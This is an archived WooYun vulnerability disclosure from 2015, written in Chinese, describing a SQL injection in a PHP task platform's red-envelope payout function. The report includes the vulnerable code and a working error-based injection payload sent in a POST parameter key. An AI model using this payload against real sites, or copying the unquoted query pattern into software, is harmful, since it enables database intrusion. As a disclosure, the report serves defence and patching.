乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-09-18: 细节已通知厂商并且等待厂商处理中 2015-09-18: 厂商已经确认,细节仅向厂商公开 2015-09-21: 细节向第三方安全合作伙伴开放(绿盟科技、唐朝安全巡航) 2015-11-12: 细节向核心白帽子及相关领域专家公开 2015-11-22: 细节向普通白帽子公开 2015-12-02: 细节向实习白帽子公开 2015-12-17: 细节向公众公开
rt
/www/lib/inc/CommonClass.php
public static function changehongbao($task_id,$moneys,$uid,$money,$title,$g) { $result=db_factory::get_one('select * from '.TABLEPRE.'witkey_space where uid='.$uid); if($g){ $newbalance=$result['balance']-$money+$moneys; db_factory::query('update '.TABLEPRE.'witkey_space set balance='.$newbalance.' where uid='.$uid); keke_finance_class::insert_trust("in", "task_xg", $uid, -$money+$moneys, $newbalance); }else{ $newbalance=$result['balance']+$money; keke_finance_class::insert_trust("in", "finish_task", $uid,$money, $newbalance,$task_id); db_factory::query('update '.TABLEPRE.'witkey_space set balance='.$newbalance.' where uid='.$uid); db_factory::query('update '.TABLEPRE.'witkey_space set is_hongbao=1 where uid='.$uid); db_factory::query('update '.TABLEPRE.'witkey_task_work set work_status=4 where uid='.$uid.' and task_id='.$task_id); } if(!$g){ $v_arr = array ( "红包任务" => '【'.$title.'】', "红包金额" => $money ); keke_msg_class::notify_user($uid, $result['username'], 'select', '红包任务完成通知',$v_arr); } return true; }
可以看到uid参数没有单引号包裹带入了查询。看看何处调用了。/www/control/select.php
......foreach ($cbk as $key => $val) { do { $lcg = lcg_value(); } while ($lcg < 0.1); if (($key + 1) == $count) { $selefHongBao[$val] = $hongbaoSum; } else { $selefHongBao[$val] = number_format($lcg * $hongbaoSum, 2); } $hongbaoSum -= $selefHongBao[$val]; $a += $selefHongBao[$val]; } foreach ($selefHongBao as $k => $v) { CommonClass::changehongbao($task_id, $task_info[0]['task_cash'], $k, $v, $task_info[0]['task_title']); } CommonClass::changehongbao('', $task_info[0]['task_cash'], $gUid, $a, $task_info[0]['task_title'], 1);.......
可以看到 这里调用了。$k来源于 selefHongBao 的键值。然而,这个程序是伪全局的,所以 我们可以添加一个$selefHongBao的键。http://localhost:801/index.php?do=selectpost:
formhash=1&selefHongBao[111 and extractvalue(1,concat(0x5c,user()))]=1111&task_id=1
对键值进行过滤。
危害等级:中
漏洞Rank:5
确认时间:2015-09-18 10:47
感谢关注
暂无